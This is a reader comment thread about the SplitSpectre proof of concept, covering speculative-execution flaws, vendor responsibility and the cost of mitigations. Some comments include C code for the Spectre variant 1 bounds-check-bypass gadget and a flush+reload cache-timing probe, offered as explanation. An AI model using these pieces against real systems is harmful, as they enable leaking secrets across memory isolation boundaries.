There's only one thing to be sick about: these processors want to return home desperately and the press won’t let them!
You've patched your Intel, AMD, Power, and Arm gear to crush those pesky data-leaking speculative execution processor bugs, right? Good, because IBM eggheads in Switzerland have teamed up with Northeastern University boffins in the US to cook up Spectre exploit code they've dubbed SplitSpectre. SplitSpectre is a proof-of- …
I'm quite happy with my i7 6700; I do not want to return it.
I surf the web with NoScript and uBlock Origin, and I only go to places I know are reliable, so all this hullabaloo leaves me stone cold.
In a few years, I'll probably have to change my equipment. By that time, whatever Spectre issues still exist will be corrected in silicon and I'll still get the performance I need.
So you never do technical research, look at white papers, shop online, use webmail services, etc.?
And you never, ever access a new site when it's been recommended by a friend / colleague?
I worked on a project some years ago where the new corporate web site design had been commissioned via a very trendy agency, and hidden away on the credits page was a link to a hacker site. It turned out the agency had subcontracted the build work and the end contractor was a 'grey hat': he funded his lifestyle by doing web dev tasks but performed what he considered ethical hacking. I never did find out his view on the corporation I was working for, and as he had been engaged by the Marketing Department, my efforts to get his code removed from the web site came to nothing.
Any web site is only as secure as the last dev who performed an update or maintenance. Devs can be malicious players, or may just not have security at the fore when they are under pressure.
The problem with the refund option is what do you get in return?
Until new silicon is out there that fully addresses Spectre, there's the possibility of a refund on the CPUs, but...
I'd point to the Pentium FDIV bug as the last time I can recall a serious issue that couldn't be addressed by a microcode patch - Intel fixed the issue and shipped new chips when sufficient volume to meet market requirements was available. The challenge this time is that, aside from disabling hyperthreading, there's not much that can be done at the hardware level without building new memory management logic, which likely puts a fix for this into 2020+ given typical 2-3 year development times.
Aside from that, if it's REALLY important, don't use virtualization or hyperthreading, to try to minimise your exposure; and if you can cope with the performance hits and your applications fully support the fixes, enable and test fixes as they are released.
Is this perfect? No. Can you provide an alternative workable solution for key business applications that already exist on vulnerable architectures while delivering required performance levels?
You say it yourself. It's broken. They chose to ignore the MMU in order to present faster systems.
Didn’t we have the same with the dear car manufacturers? They cheated on fuel efficiency and emissions, just so they could present themselves as much better than they are.
Either you get what you pay for or you get your money back. That's rather simple. We're not talking about bugs here! Intel is still shipping new silicon, while advertising their systems with benchmarks where they disable (i.e. do not enable) mitigations. That's deliberate deceit. How are you to compete with that as an honest player?
Without being slapped on the wrist hard, Intel & Co. have no reason to change.
As a lot of you may be, I'm growing a bit tired of the dirty hacks pulled by chip vendors to make their stuff appear faster than it really is. Moore's law has lived, let it rest. Until we get really novel and interesting technologies working, the real improvement margin lies in getting back to elegant and optimized code, as opposed to the mad dash for ever-more lazy hacks-on-hacks layers that we are seeing today. As a rugby coach may say, "back to basics, team". Clean up your code, focus on efficiency, stop relying on hardware improvements to compensate for your sloppy code.
Of course I know I'm pissing reverse-windwards. Not a chance in hell that this will happen anytime soon, with the ever-increasing tendency to deliberately push buggy code -or hardware- into production as fast as possible. When "fail fast, recover faster" is an acceptable industry motto, you know you're screwed.
“You say it yourself. It's broken. They chose to ignore the MMU in order to present faster systems.”
The MMU isn't broken though - it's doing exactly what it was designed to do, as it has no bits assigned to track CPU ring levels. The software fix to address Spectre is a cache flush on context switch, which causes a processor stall while the data is retrieved from main memory again, at a cost of ~500 instruction cycles per core per context switch. Multiply that by hundreds or thousands of context switches per second and you have a significant performance issue.
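To put very rough numbers on that, here's a back-of-the-envelope sketch in C. The ~500-cycle figure is the one claimed above; the switch rate and clock speed are assumptions of mine, not measurements:

    #include <stdio.h>

    int main(void) {
        /* ~500-cycle stall per context switch, per the figure above.
           Switch rate and clock speed below are assumed values. */
        const double cycles_per_switch = 500.0;
        const double switches_per_sec  = 2000.0;  /* "hundreds or thousands" */
        const double clock_hz          = 3.0e9;   /* assumed 3 GHz core */

        double lost = cycles_per_switch * switches_per_sec;
        printf("cycles lost/sec: %.0f (%.4f%% of one core)\n",
               lost, 100.0 * lost / clock_hz);
        /* The direct stall itself is small; the larger real-world cost
           is the cache and TLB misses that follow each flush. */
        return 0;
    }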
“Didn’t we have the same with the dear car manufacturers? They cheated on fuel efficiency and emissions, just so they could present themselves as much better than they are.”
The difference is that the car manufacturers had to test their vehicles in a controlled manner - we don't have equivalent tests for processors, as the number of context switches will vary significantly depending on the workload. While Spectre was predicted as being possible, it wasn't demonstrated reliably until 2017, and as almost all CPUs providing any real level of performance used branch prediction by then, there was no magic fix. And no, I don't consider the ARM processors that were unaffected to be solutions - their bigger brothers intended for server workloads were affected because they use the standard methods for improving processor performance, namely longer pipelines and branch prediction to avoid stalls...
If Intel and other manufacturers could give us an instant fix, I suspect they would have, to avoid the publicity they have had around this, and potentially to give themselves breathing space while some of them resolved existing manufacturing issues...
"SplitSpectre is a proof-of-concept built from Speculator, the team's automated CPU bug-discovery tool, which the group plans to release as open-source software."
Thanks a bunch!
Can't you just run it and tell the CPU manufacturers what you have found?
How is this better than releasing viruses in the wild?
Which is better: having vulnerabilities that can be, or are being, exploited on equipment that cannot be software-patched, may be in use in critical or sensitive roles for many years, and whose flaws have been covered up by the CPU manufacturers - or knowing about the vulnerabilities, so you can look at mitigations to stop them being exploited, or at least know the risks?
From the article: "Spec-ex is one of the key drivers of processor speed"
No doubt this is true. It is also a major driver of transistor count and power consumption. Each lost speculation is wasted computation, and if the CPU is always making a two-way speculation, it means 50 percent of the calculations are wasted electricity.
I am not a gamer. I use mainly office applications and do not need speed demons. I am far more interested in fanless operation and long battery lifetime. Why not offer chips with no speculative execution and instead use the saved transistor count for more cores and bigger caches? The question is not rhetorical; I just wonder why this is not made available.
RISC-V is said to be immune. Is that because they don't have speculative execution?
This is correct, of course. Things are a bit more complicated, however. Speculative execution can also lead to better cache usage, therefore saving energy (probably not nearly as much as is being blasted into wrong guesses).
The problem is not the speculative execution per se. It's rather the fact that they “choose to ignore a few things” for the sake of “performance”. It is idiotic to run the red lights during speculation, but so far they have gotten away with those rotten tricks.
Spec-ex doesn't need to be costly, and the speculation pays off far more often than 50% of the time. Why? Because most loops run for many iterations, so the prediction is only wrong once, at the end: even a loop body of just 10 cycles, paying one spec-ex flush on the final iteration, is considerably faster than running the same iterations without spec-ex.
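A rough cycle-count sketch of that argument, with illustrative numbers rather than measurements (pipeline penalty and loop size are assumed):

    #include <stdio.h>

    int main(void) {
        /* Illustrative numbers: a pipeline that waits ~15 cycles at every
           branch without spec-ex, vs. predicting every iteration and
           paying one flush on the final misprediction. */
        const int iterations  = 100;
        const int body_cycles = 10;   /* useful work per iteration */
        const int stall       = 15;   /* branch wait / flush penalty */

        int without_specex = iterations * (body_cycles + stall); /* 2500 */
        int with_specex    = iterations * body_cycles + stall;   /* 1015 */

        printf("without spec-ex: %d cycles\n", without_specex);
        printf("with spec-ex:    %d cycles\n", with_specex);
        return 0;
    }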
As noted elsewhere, one of the problems is due to sacrificing security for performance - as in only checking access levels on presentation of the data, rather than during the spec-ex fetch. While this seems reasonable, the timing difference between the two is noticeable, and with caching it allows the contents of the request to be derived. Slow, admittedly, but given the speed of modern processors, not impossibly so.
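For anyone who hasn't seen it, the published Spectre variant 1 pattern is essentially the following. The array names follow the Kocher et al. proof of concept and are illustrative, not code from any real product:

    #include <stddef.h>
    #include <stdint.h>

    uint8_t array1[16];
    uint8_t array2[256 * 4096];
    unsigned int array1_size = 16;

    /* The bounds check is only honoured architecturally. If the branch
       predictor guesses "in bounds" for an out-of-range x, both loads
       below still run speculatively, and array2 is left with a cache
       line warmed at an index chosen by the secret byte - which a
       timing probe can later detect. */
    void victim_function(size_t x) {
        if (x < array1_size) {                        /* mispredicted */
            uint8_t secret = array1[x];               /* speculative OOB read */
            volatile uint8_t tmp = array2[secret * 4096];
            (void)tmp;
        }
    }

Train the branch with in-bounds values of x, then call it once out of bounds; the secret byte is recoverable by timing which page of array2 has become cached.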
So "office" applications or gaming, spec-ex markedly improves performance. Just in the case of Intel, in particular, it's a case of security vs performance.
RISC-V has spec-ex; however, the spec-ex fetches go through the same MMU boundary checks as any other fetch. This doesn't mean that timing-based differentials, and therefore data leaks, are impossible, just that they are considerably harder. A properly secure system would exhibit exactly the same outward performance regardless of a cache/security hit or not. Unfortunately, that pretty much requires that spec-ex is disabled.
As a user, I now want all computing devices that I might purchase labelled to state whether or not they indulge in predictive execution - so I can avoid those that do.
OK, maybe my attitude is simplistic, but then, whilst I understand the general idea of predictive execution, I don't understand the hows, the ramifications, or how the attacks on it work at all. But I do understand that KISS applies when considering the security of computer systems, and predictive execution clearly is NOT needed for consumer computing (as I gather the software work-arounds to ameliorate the problem slowed people's PCs down by only a few percent). Maybe there's a place for it in high-level computing, but I'd happily sacrifice a little speed in return for a simpler CPU that I know has less of an attack surface.
Spec-ex is where the performance gains are. Why? Because OSes like Windows and the applications that run on them aren't sufficiently parallel, so serial processing speed has to be concentrated on, even with the burden of context switching.
The difference between, for example, Intel Atom processors without spec-ex and Intel chips with spec-ex is quite phenomenal, and a testament to the success of the technique. Shame that Intel sacrificed security for performance so badly.
Non-x86 chips can also suffer from the same problems; it really depends on where the MMU boundary checks are applied. In Intel's case it's outside of the spec-ex, giving them a serious performance boost compared to chips where the checks are applied within the spec-ex context. Technically, both are as valid as each other; it's just that, using timing tricks, it's possible to derive data where the checks are applied outside of the spec-ex execution.
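Those "timing tricks" are usually flush+reload-style probes. A minimal sketch for x86 with the GCC/Clang intrinsics, where the 100-cycle hot/cold threshold is an assumed value that would need calibrating per machine:

    #include <stdint.h>
    #include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

    /* Evict a cache line before the speculative victim code runs. */
    static void flush_line(volatile uint8_t *addr) {
        _mm_clflush((const void *)addr);
        _mm_mfence();
    }

    /* Afterwards, time a reload: a fast reload means the line is hot,
       i.e. the speculation touched it. */
    static int line_was_touched(volatile uint8_t *addr) {
        unsigned int aux;
        _mm_mfence();
        uint64_t t0 = __rdtscp(&aux);
        (void)*addr;                   /* timed reload */
        uint64_t t1 = __rdtscp(&aux);
        return (t1 - t0) < 100;        /* assumed hot/cold threshold */
    }

Flush the candidate lines with flush_line() before the victim runs, then sweep line_was_touched() over them afterwards; the one that reloads quickly is the one the speculative access warmed.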
You seem to be caught up in the mistaken belief that all the world is trumpeting the security holes. Some vulnerabilities bring in thousands, others millions. The "investors" are anxious to keep their "investment" alive as long as possible. Secrecy is therefore part of the game.